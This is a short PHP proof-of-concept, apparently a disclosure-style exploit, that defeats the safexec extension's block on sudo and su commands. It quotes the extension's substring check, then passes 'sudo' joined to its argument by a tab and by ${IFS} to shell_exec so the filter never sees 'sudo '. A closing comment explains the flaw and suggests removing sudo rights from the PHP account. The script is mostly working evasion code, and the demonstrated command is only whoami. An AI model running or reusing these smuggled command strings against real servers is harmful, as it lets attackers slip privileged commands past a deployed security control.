safexec-bypass.php
<?php
/* Safexec PHP extension bypass
* By @Wireghoul - justanotherhacker.com
*
* Safexec - https://github.com/ilk33r/safexec
* ----------------
* Safexec does a substring match on the command for "sudo " or "su " (each followed by a space) to prevent their use.
* https://github.com/ilk33r/safexec/blob/master/safeexec.c#L120
*
```
if(SAFEEXEC_G(dissallow_sudo_command))
{
char *searchSudoWord;
searchSudoWord = strstr(cmd, "sudo ");
if (searchSudoWord != NULL)
{
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Cannot execute %s command. Sudo command is not allowed with safeexec extension", cmd);
return '0';
}
searchSudoWord = strstr(cmd, "su ");
if (searchSudoWord != NULL)
{
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Cannot execute %s command. Su command is not allowed with safeexec extension", cmd);
return '0';
}
}
```
*/
// The filter quoted above rejects a command only when it contains the literal
// substring "sudo " or "su " (the name followed by an ASCII space). Neither
// string below contains a space, so strstr() finds no match, while the shell
// started by shell_exec() still splits each one into two words.
$bypasses = [
    // Bypass1: a tab ("\t") separates the words instead of a space.
    "sudo\twhoami",
    // Bypass2: \$ keeps ${IFS} literal in the PHP string; the shell expands it
    // to its field separator when it parses the command line.
    "sudo\${IFS}whoami",
];
foreach ($bypasses as $cmd) {
    shell_exec($cmd);
}
// NOTE(review): a substring blocklist on the raw command string does not model
// shell word splitting or expansion. Restricting what the PHP process account
// may run (for example, giving it no sudo rights) does not depend on how the
// command text is spelled.
?>